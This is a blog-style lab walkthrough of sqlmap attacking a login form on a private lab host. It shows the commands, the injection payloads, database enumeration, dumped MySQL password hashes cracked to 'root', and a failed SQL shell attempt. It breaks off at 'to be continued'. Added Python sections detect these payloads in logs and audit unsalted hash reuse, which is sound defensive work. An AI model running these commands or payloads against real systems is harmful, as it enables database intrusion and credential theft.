Manusia Tak Sempurna

I scan with sqlmap, and this is the syntax:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" --dbs --level=5 --risk=3
sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:36:50

[22:36:51] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming injection data from session file
[22:36:51] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:36:51] [INFO] testing connection to the target url
[22:36:51] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---
[22:36:51] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:36:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:36:58] [INFO] fetching database names
[22:36:58] [INFO] fetching number of databases
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 9
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': information_schema
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': Joomla
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': dvwa
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': mysql
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': phpmyadmin
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': test
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': webku3
[22:36:58] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': wordpress
available databases [9]:
[*] dvwa
[*] information_schema
[*] Joomla
[*] mysql
[*] phpmyadmin
[*] test
[*] webku
[*] webku3
[*] wordpress

[22:36:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:36:58

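Seen from the server side, the two payload families sqlmap reported above (the BENCHMARK heavy-query time-based probe and the OR NOT (n=n) boolean tautology, each closed with a 'xxxx'='xxxx quote-balancing suffix) are easy to spot in logged POST bodies. The detector below is an added example, not part of the original post or of sqlmap; the log lines and their 'IP METHOD PATH BODY' layout are constructed, with the payloads copied from the scan output above.

```python
"""Flag sqlmap-style blind SQLi probes in logged POST bodies (added example)."""
import re
from urllib.parse import unquote_plus

# One rule per technique sqlmap reported in the scan above.
RULES = {
    "time-based (heavy query)": re.compile(r"\bBENCHMARK\s*\(\s*\d+", re.I),
    "time-based (sleep)": re.compile(r"\bSLEEP\s*\(", re.I),
    "boolean-based (tautology)": re.compile(
        r"'\s*(?:AND|OR)\s+(?:NOT\s*)?\(?\s*(\d+)\s*=\s*\1\b", re.I),
    "quote-balancing suffix": re.compile(r"'([A-Za-z0-9]{2,8})'\s*=\s*'\1\b"),
}

def classify(body):
    """Return the names of every rule the URL-decoded POST body trips.
    sqlmap sends payloads URL-encoded, so decode before matching."""
    text = unquote_plus(body)
    return [name for name, rx in RULES.items() if rx.search(text)]

def scan(lines):
    """lines look like 'CLIENT_IP METHOD PATH BODY' (constructed format).
    Returns (line_no, rules) for each POST whose body trips at least one rule."""
    hits = []
    for no, line in enumerate(lines, 1):
        parts = line.split(" ", 3)
        if len(parts) < 4 or parts[1] != "POST":
            continue
        rules = classify(parts[3])
        if rules:
            hits.append((no, rules))
    return hits

# Constructed sample: a benign login, then the two injection payloads from the
# sqlmap output above as they arrive on the wire, then an unrelated GET.
SAMPLE_LOG = [
    "10.0.0.5 POST /webku3/login.php username=alice&password=s3cret",
    "10.0.0.9 POST /webku3/login.php username=27%27%20AND%204232%3DBENCHMARK%285000000%2CMD5%28CHAR%28110%2C86%2C112%2C67%29%29%29%20AND%20%27UxaS%27%3D%27UxaS&password=27",
    "10.0.0.9 POST /webku3/login.php username=27&password=-6012%27%20OR%20NOT%20%287812%3D7812%29%20AND%20%27FaHO%27%3D%27FaHO",
    "10.0.0.9 GET /webku3/index.php -",
]

if __name__ == "__main__":
    for no, rules in scan(SAMPLE_LOG):
        print(f"line {no}: {', '.join(rules)}")
```

A single POST tripping two rules at once is a stronger signal than either alone; the same rules also apply to query strings once they are decoded.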
and then I try to search for a username and password from the database with sqlmap:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --password --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 22:37:51

[22:37:52] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming injection data from session file
[22:37:52] [INFO] resuming back-end DBMS 'mysql 5' from session file
[22:37:52] [INFO] testing connection to the target url
[22:37:52] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[22:37:52] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 0
[22:37:54] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[22:37:54] [INFO] fetching database users password hashes
[22:37:54] [INFO] fetching database users
[22:37:54] [INFO] fetching number of database users
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 5
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'pakdhe-laptop'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'root'@'127.0.0.1'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'debian-sys-maint'@'localhost'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 'phpmyadmin'@'localhost'
[22:37:54] [INFO] fetching number of password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 2
[22:37:54] [INFO] fetching password hashes for user 'root'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
[22:37:54] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'debian-sys-maint'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *896747F40953077D8AB58F8A3002427D8DC256FE
[22:37:54] [INFO] fetching number of password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': 1
[22:37:54] [INFO] fetching password hashes for user 'phpmyadmin'
[22:37:54] [INFO] read from file '/pentest/database/sqlmap/output/192.168.56.101/session': *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[22:37:57] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[22:37:58] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[22:38:02] [INFO] starting dictionary attack (mysql_passwd)
[22:38:04] [INFO] found: 'root' for user: 'root'
[22:38:05] [INFO] found: 'root' for user: 'phpmyadmin'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *896747F40953077D8AB58F8A3002427D8DC256FE
[*] phpmyadmin [1]:
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root
[*] root [2]:
    password hash: *7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170
    password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
    clear-text password: root

[22:39:55] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/192.168.56.101'

[*] shutting down at: 22:39:55

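The dictionary attack above finished within a few seconds because the 'mysql_passwd' format (mysql_native_password) is an unsalted double SHA-1: equal passwords give equal hashes, so one guess is checked against every account at once, and the output already shows root and phpmyadmin sharing *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B. The audit below is an added example, not from the original post: it recomputes that format and screens the dumped hashes for reuse across accounts and for banned passwords (the banned list is constructed).

```python
"""Audit dumped MySQL hashes for duplicate and banned passwords (added example)."""
import hashlib
from collections import defaultdict

def mysql_native_hash(password):
    """mysql_native_password, the 'mysql_passwd' format sqlmap cracked above:
    '*' + SHA1(SHA1(password)) in upper-case hex. There is no salt."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()

# Hashes per account exactly as sqlmap listed them in the output above.
DUMPED = {
    "root": ["*7B4BDBFF8519BFDF2FEBEAF893534A8163E9F170",
             "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"],
    "phpmyadmin": ["*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B"],
    "debian-sys-maint": ["*896747F40953077D8AB58F8A3002427D8DC256FE"],
}

# Constructed banned-password list (a real deployment would use a much larger one).
BANNED = ["password", "123456", "admin", "root"]

def shared_hashes(dumped):
    """Map each hash used by more than one account to the accounts sharing it.
    Because the format is unsalted, password reuse is visible in the dump itself."""
    owners = defaultdict(set)
    for account, hashes in dumped.items():
        for h in hashes:
            owners[h].add(account)
    return {h: sorted(a) for h, a in owners.items() if len(a) > 1}

def banned_matches(dumped, banned):
    """Hash each banned word once, then look every dumped hash up in that table:
    the cost is one SHA-1 pair per word no matter how many accounts there are."""
    table = {mysql_native_hash(word): word for word in banned}
    return {account: table[h]
            for account, hashes in dumped.items()
            for h in hashes if h in table}

if __name__ == "__main__":
    print("reused hashes:", shared_hashes(DUMPED))
    print("banned passwords in use:", banned_matches(DUMPED, BANNED))
```

MySQL 8's default caching_sha2_password salts its stored hashes, so two accounts with the same password no longer share a stored value; that is exactly the property missing here.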
Then I try to connect from sqlmap to the MySQL shell:

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://192.168.56.101/webku3/login.php?" --data "username=27&password=27" -D phpmyadmin -T user --sql-shell --level=5 --risk=3

    sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 08:27:56

[08:27:56] [INFO] using '/pentest/database/sqlmap/output/192.168.56.101/session' as session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming injection data from session file
[08:27:56] [INFO] resuming back-end DBMS 'mysql 5' from session file
[08:27:56] [INFO] testing connection to the target url
[08:27:56] [INFO] heuristics detected web page charset 'ascii'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: username
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27' AND 4232=BENCHMARK(5000000,MD5(CHAR(110,86,112,67))) AND 'UxaS'='UxaS&password=27

Place: POST
Parameter: password
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: username=27&password=-6012' OR NOT (7812=7812) AND 'FaHO'='FaHO

    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: username=27&password=27' AND 3903=BENCHMARK(5000000,MD5(CHAR(120,68,103,113))) AND 'QbLo'='QbLo
---

[08:27:56] [INFO] manual usage of POST payloads requires url encoding
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: username, type: Single quoted string (default)
[1] place: POST, parameter: password, type: Single quoted string
[q] Quit
> 1
[08:27:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[08:27:59] [INFO] calling MySQL shell. To quit type 'x' or 'q' and press ENTER
sql-shell> show databases;
do you want to retrieve the SQL statement output? [Y/n/a] y
[08:28:18] [INFO] fetching SQL SELECT statement query output: 'show databases;'
[08:28:18] [WARNING] running in a single-thread mode. please consider usage of --threads option to declare higher number of threads
[08:28:18] [INFO] retrieved:
sql-shell>

But it seems it can't connect.

to be continued................
